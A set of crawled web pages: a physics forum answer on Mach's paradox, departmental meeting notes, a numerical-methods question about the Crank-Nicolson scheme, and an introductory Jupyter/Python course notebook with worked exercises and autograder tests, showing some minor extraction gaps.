It is perhaps interesting to think about Mach's paradox in this context. I'll get back to your question and the limits of the two-body way of discussing special relativity in the end. One form of the paradox is this: imagine a bucket of water standing on the floor. The surface is (almost) flat. Now start spinning it. The water's surface begins to form a paraboloid. How does the water know it's spinning? Why is the frame of reference in which the water's surface is flat the same frame in which the stars do not move relative to the bucket (which almost coïncides with the frame where the Earth is still)?
The answer is that the presence of the stars determines the global geometry of the universe, and thus the local free-falling frame in which the bucket finds itself up to small corrections due to Earth's gravity and rotation (which is in free fall around the sun which is in free fall through the galaxy which is in free fall through the universe).
Now how does all this relate to your question? Well, we can determine accelerations relative to a global frame given by the fixed stars with as simple a tool as the aforementioned bucket. But if we accept that global frame as special, then we can also detect motion relative to that global frame, which is in a sense absolute as it is given by the universe in its entirety. To do this, you'd need a long exposure and a clear night-sky. You would then compare the motion of your tennis balls to the motion of the stars and you could in a meaningful sense call the difference of the motion relative to the stars an absolute motion, as it is relative to the universe as a whole (well, to good approximation depending on how many stars you can actually photograph). Since this is literally the opposite of what you had asked, it doesn't literally answer your question, but I think it answers the same question in spirit, namely whether there is a physical difference between "moving" and "stationary."
NB It may seem that I'm upending all of special relativity by that line of thinking but that's not true. Special relativity is a good law of nature, one just has to be aware of other objects which are present when applying it, and whether they have any influence on the question studied -- and that statement is a trivial truth which certainly was on Einstein's mind when he wrote the time dilation law for the first time.
It is possible to measure absolute motion relative to the cosmic microwave background.. A system in rest with the moving ball would measure a dipole in the background radiation.
If we look past your example with snapshots we can just look into modern technology and find a little thing called videos. They can record motion pretty easily. "Is there any physical evidence for motion", videos? | 2022-05-19 00:29:30 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 4, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5243282914161682, "perplexity": 371.3058923525854}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662522556.18/warc/CC-MAIN-20220518215138-20220519005138-00565.warc.gz"} |
https://wiki.cs.byu.edu/cc/9-november-2015 | 1. VPN roll-out
Getting students used to it.
2. Collaborative Space status update
Furniture delivered day before Thanksgiving
3. Web site redesign status update
Need to formulate an RFP. Search for documents department wide, not just in a lab.
List of functionality:
Admin Roles Research – research projects (infinite scroll) – research page (one project)
- tag people associated with each project (and role?)
People – associated with each person? Publications – abstract
4. Laptop requirement and lab space usage
5. Items all research faculty could use
• storage, e.g. Oracle – a disk shelf could provide 70 TB - 110 TB depending on mirroring strategy
• cost is $33K • about$302/TB
• backup - LTL 6 tape library, 60 tape cartridge slots, backup 150 TB
• cost is \$14K
Survey
1. What computing needs to you have in your research lab? (Choose any/all) a) storage b) servers c) desktop d) computing (e.g. supercomputer) e) backup f) other
2. How much storage space do you need? (choose one) a) 1 TB b) 2 TB c) 5 TB d) 10 TB e) more
3) How many servers do you run? a) 0 b) 1 c) 2 d) 5 e) more
4) Can they be consolidated into a single virtual machine?
5) Do you have an interest in outsourcing some of your computing needs, e.g. to OIT, CSRs, or off-campus services?
6) Do you have any other comments? | 2021-05-19 03:30:45 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.20481497049331665, "perplexity": 14515.25080447174}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243991562.85/warc/CC-MAIN-20210519012635-20210519042635-00275.warc.gz"} |
https://math.stackexchange.com/questions/2285614/taylor-series-expansion-for-pde | # Taylor series expansion for PDE
Exercise 4: The Crank-Nicolson scheme for $u_t + a u_x = 0$ is given by $$\frac{U_{j,n+1}-U_{j,n}}{\Delta t} + \frac{a}{2}\frac{D_xU_{j,n}}{2\Delta x} + \frac{a}{2}\frac{D_xU_{j,n+1}}{2\Delta x} = 0 .$$ Show that the LTE is given by $$\mathcal{L}_\Delta u = au_{xxx} \left(\frac{1}{6} + \frac{p^2}{12}\right) {\Delta x}^2 + O({\Delta x}^3,{\Delta t}^3) ,$$ where $p = a{\Delta t}/{\Delta x}$. Find the amplification factor and find the conditions for stability.
I have expanded this about a dozen times, I do not get the correct answer. Can someone please show me.
My working
$$\frac{ u(x , t + \delta ) - u( x,t)} { \delta t} + \frac{a}{2} \frac{u( x+ \delta x,t)-u(x-\delta x,t)}{ 2 \delta x} + \frac{a}{2} \frac{u ( x + \delta , t+ \delta t ) - u ( x- \delta x, t+ \delta t)} {2 \delta x}$$
expanding using taylor series I get
$$\frac{1}{\delta t} [ u + u_{t} \delta t + \frac{u_{tt}}{2} \delta t^{2} + O ( \Delta t^{3})]$$
$$\frac{1}{\delta x^{2}} [ u_xx \delta x^{2} + \frac{1}{12} u_{xxxx} + O(\Delta x^{6})]$$
$$u_{xx} + u_{xxt} \delta t + O(\Delta^{2}) +\frac{1}{12}u_{xxxx} \delta x^{2} + \frac{1}{12} u_{xxxxt} \delta x^{2} \delta t$$
these are the three terms I get after expanding for each one, however after rearranging, and using $u_t = -au_x$, I still am not able to get the correct answer.
I am hoping someone can show me as I really need to know this for my exam.
Thank you,
• Really? I have done it repeated and dont get the correct answer, clear doing it wrong, I will type my working out and put it up. Cause its so much expansions, I thouoght it would be long to type out – italy May 17 '17 at 21:36
• I have added on my answer, can you please have look and let me know, / show me the correct way, as I really need to know how to do this. Thank you. – italy May 17 '17 at 21:50
• anybody know how to it? – italy May 17 '17 at 23:01
• Sorry, I'm not familiar with this, I 've just added tag Laplace to make it more visible for audience. – zwim May 18 '17 at 5:26
• But I though you said you have jut done it and it work for you. – italy May 18 '17 at 17:12 | 2019-09-20 23:23:25 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7746966481208801, "perplexity": 336.3907810249562}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514574084.88/warc/CC-MAIN-20190920221241-20190921003241-00071.warc.gz"} |
http://qim.dk/jupyter/ | Introduction to Jupyter notebooks and Python
This is a quick introduction to Jupyter notebooks and Python. It combines key elements from several open source introductory courses on Jupyter and Python for scienfitic computing. Previous experience with programming is assumed (Elementary experience with MATLAB, R, etc. or C, C++, etc. is fine).
Author: Nicolai Riis, DTU Compute, July 2017.
Each notebook takes roughly 1 hour to go through (reading + exercises).
Consider skipping segments that are familiar to you and using the notebooks as refence during the course.
List of notebooks:
1) Introduction to Jupyter notebooks and Python – (Current)
Licence:
These notebooks are released under the Attribution 3.0 Unported Licence (https://creativecommons.org/licenses/by/3.0/). This means you are free to share and adapt the content as you please as long as you give appropriate credit, link the licence and indicate if changes are made to the material.
For the original content that these notebooks are based upon please see:
[email protected]
1.4 Exercises
1.1 The Jupyter notebook interface
In this course, you will be using the Jupyter Notebook as a toolkit for producing reproducable and replicable work in scientific computing.
A notebook consists of a series of cells. For example, this text is in what is called a “Markdown cell”. The following cell is a “code cell”:
# this is a code cell
You can tell what the type of a cell is by selecting the cell, and looking at the toolbar at the top of the page. For example, try clicking on this cell. You should see the cell type menu displaying “Markdown”, like this:
Command mode and edit mode
In the notebook, there are two modes: edit mode and command mode. By default the notebook begins in command mode. In order to edit a cell, you need to be in edit mode.
When you are in command mode, you can press enter to switch to edit mode. The outline of the cell you currently have selected will turn green, and a cursor will appear.
When you are in edit mode, you can press escape to switch to command mode. The outline of the cell you currently have selected will turn gray, and the cursor will disappear.
Markdown cells
For example, a markdown cell might look like this in command mode (Note: the following few cells are not actually cells – they are images and just look like cells! This is for demonstration purposes only.)
Then, when you press enter, it will change to edit mode:
Now, when we press escape, it will change back to command mode:
However, you’ll notice that the cell no longer looks like it did originally. This is because IPython will only render the markdown when you tell it to. To do this, we need to “run” the cell by pressing Ctrl-Enter, and then it will go back to looking like it did originally:
Code cells
For code cells, it is pretty much the same thing. This is what a code cell looks like in command mode (again, the next few cells LOOK like cells, but are just images):
If we press enter, it will change to edit mode:
And pressing escape will also go back to command mode:
If we were to press Ctrl-Enter like we did for the markdown cell, this would actually run the code in the code cell:
Executing cells
Code cells can contain any valid Python code in them (We give a short introduction to Python in Section 1.3). When you run the cell, the code is executed and any output is displayed.
You can execute cells with Ctrl-Enter (which will keep the cell selected), or Shift-Enter (which will select the next cell).
Try running the following cell and see what it prints out:
print("Printing cumulative sum from 1-10:")
total = 0
for i in range(1, 11):
total += i
print("Sum of 1 to " + str(i) + " is: " + str(total))
print("Done printing numbers.")
You’ll notice that the output beneath the cell corresponds to the print statements in the code. Here is another example, which only prints out the final sum:
total = 0
for i in range(1, 11):
total += i
print(total)
Another way to print something out is to have that thing be the last line in the cell. For example, we could rewrite our example above to be:
total = 0
for i in range(1, 11):
total += i
total
However, this will not work unless the thing to be displayed is on the last line. For example, if we wanted to print the total sum and then a message after that, this will not do what we want (it will only print “Done computing total.”, and not the total sum itself).
total = 0
for i in range(1, 11):
total += i
total
print("Done computing total.")
If you are accustomed to Python 2, note that the parentheses are obligatory for the print function in Python 3.
1.2 The IPython kernel
When you first start a notebook, you are also starting what is called a kernel. This is a special program that runs in the background and executes Python code. Whenever you run a code cell, you are telling the kernel to execute the code that is in the cell, and to print the output (if any).
Just like if you were typing code at the Python interpreter, you need to make sure your variables are declared before you can use them. What will happen when you run the following cell? Try it and see:
a
The issue is that the variable a does not exist. We must make sure a is declared first (for example, you could set the value of a to 5 – or pick whatever value you want). Note the “=” sign is used for assigning a value. Once you have modified the above cell, you should be able to run the following cell (if you haven’t modified the above cell, you’ll get the same error!):
print("The value of 'a' is: " + str(a))
Running the above cell should work, because a has now been declared. To see what variables have been declared, you can use the %whos command:
%whos
If you ran the summing examples from the previous section, you’ll notice that total and i are listed under the %whos command. That is because when we ran the code for those examples, they also modified the kernel state.
(Note that commands beginning with a percent (%) or double percent (%%) are special IPython commands called magics. They will only work in IPython.)
Restarting the kernel
It is generally a good idea to periodically restart the kernel and start fresh, because you may be using some variables that you declared at some point, but at a later point deleted that declaration.
Your code should always be able to work if you run every cell in the notebook, in order, starting from a new kernel.
To test that your code can do this, first restart the kernel by clicking the restart button:
Then, run all cells above this one in the notebook in order by choosing Cell$\rightarrow$Run All Above from the menu above. (while having this cell selected in command mode)
There are many keyboard shortcuts for the notebook. To see a full list of these, go to Help$\rightarrow$Keyboard Shortcuts.
To learn a little more about what things are what in the IPython Notebook, check out the user interface tour, which you can access by going to Help$\rightarrow$User Interface Tour.
1.3 Quick Introduction to Python
The code you ran from the previous section was written in the Python programming language.
What is Python?
Python is a modern, general-purpose, object-oriented, high-level programming language.
General characteristics of Python:
• clean and simple language: Easy-to-read and intuitive code, easy-to-learn minimalistic syntax, maintainability scales well with size of projects.
• expressive language: Fewer lines of code, fewer bugs, easier to maintain.
Technical details:
• dynamically typed: No need to define the type of variables, function arguments or return types.
• automatic memory management: No need to explicitly allocate and deallocate memory for variables and data arrays. No memory leak bugs.
• interpreted: No need to compile the code. The Python interpreter reads and executes the python code directly.
• The main advantage is ease of programming, minimizing the time required to develop, debug and maintain the code.
• Well designed language that encourage many good programming practices:
• Modular and object-oriented programming, good system for packaging and re-use of code. This often results in more transparent, maintainable and bug-free code.
• Documentation tightly integrated with the code.
• A large standard library, and a large collection of add-on packages.
• Since Python is an interpreted and dynamically typed programming language, the execution of python code can be slow compared to compiled statically typed programming languages, such as C and Fortran.
• Somewhat decentralized, with different environment, packages and documentation spread out at different places. Can make it harder to get started.
Modules
Most of the functionality in Python is provided by modules. The Python Standard Library is a large collection of modules that provides cross-platform implementations of common facilities such as access to the operating system, file I/O, string management, network communication, and much more.
To use a module in a Python program it first has to be imported. A module can be imported using the import statement. For example, to import the module math, which contains many standard mathematical functions, we can do:
import math
This includes the whole module and makes it available for use later in the program. For example, we can do:
x = math.cos(2 * math.pi)
print(x)
Note: Make sure you are running the code examples above (recall command: Shift+Enter).
Looking at what a module contains, and its documentation
Once a module is imported, we can list the symbols it provides using the dir function:
import math
print(dir(math))
And using the function help we can get a description of each function (almost .. not all functions have docstrings, as they are technically called, but the vast majority of functions are documented this way).
help(math.log)
math.log(10)
math.log(10, 2)
Assignment
As you have already seen, the assignment operator in Python is =. Python is a dynamically typed language, so we do not need to specify the type of a variable when we create one.
Assigning a value to a new variable creates the variable:
# variable assignments
x = 1.0
Although not explicitly specified, a variable does have a type associated with it. The type is derived from the value that was assigned to it.
type(x)
Try changing x in the code cells above to an integer or bool (True,False) and check the type again.
Type casting
We can “cast” a type from one to another as follows.
x = 1.5
print(x, type(x))
x = int(x) #Change float to int (rounds down)
print(x, type(x))
This is used alot when printing, casting everything to a string (str). If you remove the str( ) around the x, then the print function will fail. (See the section on print futher down)
print("The value of x is: " + str(x))
Operators and comparisons
Most operators and comparisons in Python work as one would expect:
• Arithmetic operators +, -, *, /, // (integer division), ‘**’ power
1 + 2, 1 - 2, 1 * 2, 1 // 2
1.0 + 2.0, 1.0 - 2.0, 1.0 * 2.0, 1.0 / 2.0
Note: The / operator always performs a floating point division in Python 3.x.
This is not true in Python 2.x, where the result of / is always an integer if the operands are integers.
to be more specific, 1/2 = 0.5 (float) in Python 3.x, and 1/2 = 0 (int) in Python 2.x (but 1.0/2 = 0.5 in Python 2.x).
• The boolean operators are spelled out as the words and, not, or.
True and False
not False
• Comparison operators >, <, >= (greater or equal), <= (less or equal), == equality, is identical.
2 > 1, 2 < 1
# equality
[1,2] == [1,2]
# objects identical?
l1 = l2 = [1,2]
l1 is l2
Compound types: Strings, List and dictionaries
Strings
Strings are the variable type that is used for storing text messages.
s = "Hello world"
type(s)
# length of the string: the number of characters
len(s)
We can index a character in a string using []:
s[0]
Heads up MATLAB users: Indexing start at 0!
We can extract a part of a string using the syntax [start:stop], which extracts characters between index start and stop -1 (the character at index stop is not included):
s[0:5]
s[4:5]
If we omit either (or both) of start or stop from [start:stop], the default is the beginning and the end of the string, respectively:
s[:5]
s[6:]
We can also define the step size using the syntax [start:end:step] (the default value for step is 1, as we saw above):
s[::1]
s[::2]
This technique is called slicing. Read more about the syntax here: http://docs.python.org/release/2.7.3/library/functions.html?highlight=slice#slice
Python has a very rich set of functions for text processing. See for example http://docs.python.org/2/library/string.html for more information.
String formatting examples
print("str1", "str2", "str3") # The print statement concatenates strings with a space
print("str1", 1.0, False, -1j) # The print statements converts all arguments to strings
print("value = %f" % 1.0) # we can use C-style string formatting
# alternative, more intuitive way of formatting a string
s3 = 'value1 = {0}, value2 = {1}'.format(3.1415, 1.5)
print(s3)
List
Lists are very similar to strings, except that each element can be of any type.
The syntax for creating lists in Python is [...]:
l = [1,2,3,4]
print(type(l))
print(l)
We can use the same slicing techniques to manipulate lists as we could use on strings:
print(l)
print(l[1:3])
print(l[::2])
Python lists can be inhomogeneous and arbitrarily nested:
nested_list = [1, [2, [3, [4, [5]]]]]
nested_list
s
s# convert a string to a list by type casting:
s2 = list(s)
s2
Adding, inserting, modifying, and removing elements from lists
# create a new empty list
l = []
# add an elements using append
l.append("A")
l.append("d")
l.append("d")
print(l)
We can modify lists by assigning new values to elements in the list. In technical jargon, lists are mutable.
l[1] = "p"
l[2] = "q"
print(l)
Remove first element with specific value using ‘remove’
l.remove("A")
print(l)
Remove an element at a specific location using del:
del l[1]
print(l)
Tuples
Tuples are like lists, except that they cannot be modified once created, that is they are immutable.
In Python, tuples are created using the syntax (..., ..., ...), or even ..., ...:
point = (10, 20)
print(point, type(point))
We can unpack a tuple by assigning it to a comma-separated list of variables:
x, y = point
print("x =", x)
print("y =", y)
If we try to assign a new value to an element in a tuple we get an error:
point[0] = 20
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
<ipython-input-114-ac1c641a5dca> in <module>()
----> 1 point[0] = 20
TypeError: 'tuple' object does not support item assignment
Dictionaries
Dictionaries are also like lists, except that each element is a key-value pair. The syntax for dictionaries is {key1 : value1, ...}:
params = {"parameter1" : 1.0,
"parameter2" : 2.0,
"parameter3" : 3.0,}
print(type(params))
print(params)
print("parameter1 = " + str(params["parameter1"]))
print("parameter2 = " + str(params["parameter2"]))
print("parameter3 = " + str(params["parameter3"]))
params["parameter1"] = "A"
params["parameter2"] = "B"
params["parameter4"] = "D"
print("parameter1 = " + str(params["parameter1"]))
print("parameter2 = " + str(params["parameter2"]))
print("parameter3 = " + str(params["parameter3"]))
print("parameter4 = " + str(params["parameter4"]))
Control Flow
Conditional statements: if, elif, else
The Python syntax for conditional execution of code uses the keywords if, elif (else if), else:
statement1 = False
statement2 = False
if statement1:
print("statement1 is True")
elif statement2:
print("statement2 is True")
else:
print("statement1 and statement2 are False")
For the first time, here we encounted a peculiar and unusual aspect of the Python programming language: Program blocks are defined by their indentation level.
Compare to the equivalent C code:
if (statement1)
{
printf("statement1 is True\n");
}
else if (statement2)
{
printf("statement2 is True\n");
}
else
{
printf("statement1 and statement2 are False\n");
}
In C blocks are defined by the enclosing curly brakets { and }. And the level of indentation (white space before the code statements) does not matter (completely optional).
But in Python, the extent of a code block is defined by the indentation level (usually a tab or say four white spaces). This means that we have to be careful to indent our code correctly, or else we will get syntax errors.
Examples:
statement1 = statement2 = True
if statement1:
if statement2:
print("both statement1 and statement2 are True")
# Bad indentation!
if statement1:
if statement2:
print("both statement1 and statement2 are True") # this line is not properly indented
Try fixing the indentation in the above code cell so it runs without error
statement1 = False
if statement1:
print("printed if statement1 is True")
print("still inside the if block")
if statement1:
print("printed if statement1 is True")
print("now outside the if block")
Loops
In Python, loops can be programmed in a number of different ways. The most common is the for loop, which is used together with iterable objects, such as lists. The basic syntax is:
for loops:
for x in [1,2,3]:
print(x)
The for loop iterates over the elements of the supplied list, and executes the containing block once for each element. Any kind of list can be used in the for loop. For example:
for x in range(4): # by default range start at 0
print(x)
Note: range(4) does not include 4 !
for x in range(-3,3):
print(x)
for word in ["scientific", "computing", "with", "python"]:
print(word)
To iterate over key-value pairs of a dictionary:
params.items() #Gives a dict of key, value pairs.
for key, value in params.items():
print(key + " = " + str(value))
List comprehensions: Creating lists using for loops:
A convenient and compact way to initialize lists:
l1 = [x**2 for x in range(0,5)]
print(l1)
while loops:
i = 0
while i < 5:
print(i)
i = i + 1
print("done")
Note that the print("done") statement is not part of the while loop body because of the difference in indentation.
Functions
A function in Python is defined using the keyword def, followed by a function name, a signature within parentheses (), and a colon :. The following code, with one additional level of indentation, is the function body.
def func0():
print("test")
func0()
Optionally, but highly recommended, we can define a so called “docstring”, which is a description of the functions purpose and behaivor. The docstring should follow directly after the function definition, before the code in the function body.
def func1(s):
"""
Print a string 's' and tell how many characters it has
"""
print(s + " has " + str(len(s)) + " characters")
help(func1)
func1("test")
Functions that returns a value use the return keyword:
def square(x):
"""
Return the square of x.
"""
return x ** 2
square(4)
We can return multiple values from a function using tuples (see above):
def powers(x):
"""
Return a few powers of x.
"""
return x ** 2, x ** 3, x ** 4
powers(3)
x2, x3, x4 = powers(3)
print(x3)
Default argument and keyword arguments
In a definition of a function, we can give default values to the arguments the function takes:
def myfunc(x, p=2, debug=False):
if debug:
print("evaluating myfunc for x = " + str(x) + " using exponent p = " + str(p))
return x**p
If we don’t provide a value of the debug argument when calling the the function myfunc it defaults to the value provided in the function definition:
myfunc(5)
myfunc(5, debug=True)
If we explicitly list the name of the arguments in the function calls, they do not need to come in the same order as in the function definition. This is called keyword arguments, and is often very useful in functions that takes a lot of optional arguments.
myfunc(p=3, debug=True, x=7)
Classes
Classes are the key features of object-oriented programming. A class is a structure for representing an object and the operations that can be performed on the object.
In Python a class can contain attributes (variables) and methods (functions).
A class is defined almost like a function, but using the class keyword, and the class definition usually contains a number of class method definitions (a function in a class).
• Each class method should have an argument self as its first argument. This object is a self-reference.
• Some class method names have special meaning, for example:
class Point:
"""
Simple class for representing a point in a Cartesian coordinate system.
"""
def __init__(self, x, y):
"""
Create a new Point at x, y.
"""
self.x = x
self.y = y
def translate(self, dx, dy):
"""
Translate the point by dx and dy in the x and y direction.
"""
self.x += dx
self.y += dy
def __str__(self):
return("Point at [%f, %f]" % (self.x, self.y))
To create a new instance of a class:
p1 = Point(0, 0) # this will invoke the __init__ method in the Point class
print(p1) # this will invoke the __str__ method
To invoke a class method in the class instance p:
p2 = Point(1, 1)
p1.translate(0.25, 1.5)
print(p1)
print(p2)
Note that calling class methods can modifiy the state of that particular class instance, but does not effect other class instances or any global variables.
That is one of the nice things about object-oriented design: code such as functions and related variables are grouped in separate and independent entities.
Exceptions
In Python errors are managed with a special language construct called “Exceptions”. When errors occur exceptions can be raised, which interrupts the normal program flow and fallback to somewhere else in the code where the closest try-except statement is defined.
To generate an exception we can use the raise statement, which takes an argument that must be an instance of the class BaseException or a class derived from it.
raise Exception("description of the error")
A typical use of exceptions is to abort functions when some error condition occurs, for example:
def my_function(arguments):
if not verify(arguments):
raise Exception("Invalid arguments")
# rest of the code goes here
To gracefully catch errors that are generated by functions and class methods, or by the Python interpreter itself, use the try and except statements:
try:
# normal code goes here
except:
# code for error handling goes here
# this code is not executed unless the code
# above generated an error
For example:
try:
print("test")
# generate an error: the variable test is not defined
print(test)
except:
print("Caught an exception")
To get information about the error, we can access the Exception class instance that describes the exception by using for example:
except Exception as e:
To get information about the error, we can access the Exception class instance that describes the exception by using for example:
except Exception as e:
1.4 Exercises
At the end of each notebook there will be a few coding assignments. To evaulate the assignments we provide automated test that your code must pass. These will be in one or more cells after the code you need to write. The tests are meant as a guide to check that your implementation is correct and may not catch all errors. In the following exercise, there is one test cell after the cell where you should put your answer.
Exercise 1: Hello (1 point)
Implement the function hello and make sure the test cells runs without any errors. You will need to delete the line with raise NotImplementedError, write your own solution, and then re-run the cell before running the test cell. Each time you change code in a cell, you will need to re-run that cell before running any other cells that depend on it!
def hello(name):
"""Returns a message containing "Hello, <name>!",
where <name> is passed in as an argument.
Parameters
----------
name : string
The name of the person to say hello to
Returns
-------
the message containing "Hello, <name>!"
"""
return "Hello, " + name + "!"
# try running your hello function with your own name and see what
# it returns
# Hint: if the test cell is not passing, but your function seems
# to be showing the right thing, make sure you are actually
# returning a value from your function! You should be using
# return, not print. For example, this cell should display:
#
# Your function returned: Hello, Reverend Bayes!
#
# and not:
#
# Hello, Reverend Bayes!
message = hello("Reverend Bayes")
print("Your function returned: " + str(message))
When completing a problem set, it is often useful to supplement the autograder tests with test cases of your own. Below, we provide you with a “scratch” cell to be used for your own testing purposes.
Keep in mind, however, that writing your own test cases is **completely optional** — these are only here to help you as you complete the assignment. This means that you will *not* be graded on anything you include in this cell!
# add your own test cases in this cell!
"""(1 point) Test code for the 'hello' function. This cell should NOT give any errors when it is run."""
from nose.tools import assert_equal
assert_equal(hello("Jessica"), "Hello, Jessica!")
assert_equal(hello("jessica"), "Hello, jessica!")
assert_equal(hello("Tom"), "Hello, Tom!")
assert_equal(hello("123"), "Hello, 123!")
print("Success!")
Exercise 2: Cosine function for lists
Unfurtuantly the cosine function from the math library is not able to accept lists as input. So if we wanted to get the cosine of say the numbers in the list [0,12 Pi, Pi], we would have to input each element one at a time!
Pi = math.pi
cosines = math.cos([0,1/2*Pi,Pi])
Implement the function cos_list to output the cosine of each real number from an input list of real numbers and make sure the test cells runs without any errors. You will need to delete the line with raise NotImplementedError, write your own solution, and then re-run the cell before running the test cell. Each time you change code in a cell, you will need to re-run that cell before running any other cells that depend on it!
def cos_list(l):
"""Returns a list with the cosine of each element an input list,
where the list is passed in as an argument "l".
Parameters
----------
l : list (non-empty) of real numbers, i.e., [5] or [5,3.14] or [1,9.2,-15]
Returns
-------
A list with the cosines of each real number in l.
"""
import math
if type(l) is not list:
raise Exception("Input is not a list")
if not l:
raise Exception("Input list is empty")
for x in l:
if (type(x) is not float) and (type(x) is not int):
raise ValueError("Input list nust only contain real numbers")
cosines = []
for x in l:
cosines.append(math.cos(x))
return cosines
# add your own test cases in this cell!
"""(2 points) Test of results for the 'cos_list' function. This cell should NOT give any errors when it is run."""
from nose.tools import assert_equal
assert_equal([round( elem, 4) for elem in cos_list([0,1,3])],[1.0, 0.5403, -0.99])
assert_equal([round( elem, 4) for elem in cos_list([math.pi,1/2*math.pi])],[-1.0, 0.0])
assert_equal([round( elem, 4) for elem in cos_list([37])],[0.7654])
assert_equal([round( elem, 4) for elem in cos_list([9.13,-15,0.9])],[-0.9569, -0.7597, 0.6216])
print("Success!")
Consider improving the cos_list function to throw exceptions if it gets unexpected input. To do this, make sure to check if the input is actually a list and that it contains real numbers.
That is if input is not a list:
raise Exception("Input is not a list")
and if input is an empty list:
raise Exception("Input list is empty")
and if input list contains anything else than real numbers (float or integer):
raise ValueError("Input list must only contain real numbers")
"""(1 point) Test input checking for the 'cos_list' function. This cell should NOT give any errors when it is run."""
from nose.tools import assert_equal, assert_raises
assert_raises(Exception, cos_list, 5)
assert_raises(Exception, cos_list, math.pi)
assert_raises(Exception, cos_list, "hello")
assert_raises(ValueError, cos_list, [0,"hello"])
assert_raises(ValueError, cos_list, ["hello"])
assert_raises(ValueError, cos_list, [[3.14]])
print("Success!")
"""(1 point) Test input checking for the 'cos_list' function. This cell should NOT give any errors when it is run."""
from nose.tools import assert_equal, assert_raises
assert_raises(Exception, cos_list, [])
print("Success!")
Exercise 3: Building a class for persons with (name,sex,age)
Create a class called Person that contains the name, age and sex of a person.
A person should be added as follows:
p1 = Person(name='Billy', age=12, sex='M')
which should return an object p1, with p1.name=‘Billy, p1.age=12, p1.sex=’M’.
The class should be able to handle missing inputs by assigning them the “None” type.
That is if:
p2 = Person(name='Billy', sex='M')
then p2.age should return None.
If the sex is initalized as ’M’ for male, but no name is set, then the name should be defaulted to ‘John Doe’.
Similarly, if the sex is ‘F’, the name should default to ‘Jane Doe’ if no name is set.
Finally, print(p1) should print
Name: Billy, Age: 12, Sex: M.
class Person:
"""
A class representing a person from their name, age and sex.
Init example:
p1 = Person(name='Billy', age=12, sex='M')
outputs:
print(p1)
Name: Billy, Age: 12, sex: M.
"""
def __init__(self, name=None, age=None, sex=None):
"""
Init person
"""
self.sex = sex
self.age = age
self.name = name
self.relatives = []
if self.name is None:
if self.sex is "F":
self.name = 'Jane Doe'
elif self.sex is "M":
self.name = 'John Doe'
if type(person) is Person:
self.relatives.append(person)
else:
raise Exception('Trying to add someone that is not the Person class, ignoring')
def show_relatives(self):
for p in self.relatives:
print(p)
def __str__(self):
return("Name: {}, Age: {}, Sex: {}.".format(self.name, self.age, self.sex))
# add your own test cases in this cell!
"""(2 points) Test input checking for the 'Person' Class. This cell should NOT give any errors when it is run."""
from nose.tools import assert_equal, assert_raises
test_p = Person(name='Bob', age=15, sex='M')
assert_equal(test_p.name, 'Bob')
assert_equal(test_p.age,15)
assert_equal(test_p.sex,'M')
test_q = Person(age=15, sex='M')
assert_equal(test_q.name, 'John Doe')
assert_equal(test_q.age,15)
assert_equal(test_q.sex,'M')
test_w = Person(sex='F')
assert_equal(test_w.name, 'Jane Doe')
assert_equal(test_w.age,None)
assert_equal(test_w.sex,'F')
test_x = Person()
assert_equal(test_x.name, None)
assert_equal(test_x.age,None)
assert_equal(test_x.sex,None)
assert_equal(test_p.__str__(),"Name: Bob, Age: 15, Sex: M.")
print("Success!")
Improve the Person class by adding the notion of relatives. Specifically add two new methods
add_relatives and show_relatives.
A persons relatives should be added as follows:
p1 = Person(name='Billy', age=12, sex='M')
p2 = Person(name='Charlie', age=37, sex='M')
p3 = Person(name='Alice', age=32, sex='F')
and shown by printing the result of the print statement for each relative.
p1.show_relatives()
should print
Name: Charlie, Age: 37, Sex: M.
Name: Alice, Age: 32, Sex: F.
# add your own test cases in this cell!
"""(2 points) Test input checking for the 'Person' Class. This cell should NOT give any errors when it is run."""
from nose.tools import assert_equal, assert_raises
import sys
from io import StringIO
test_p = Person(name='Bob', age=15, sex='M')
test_q = Person(age=15, sex='M')
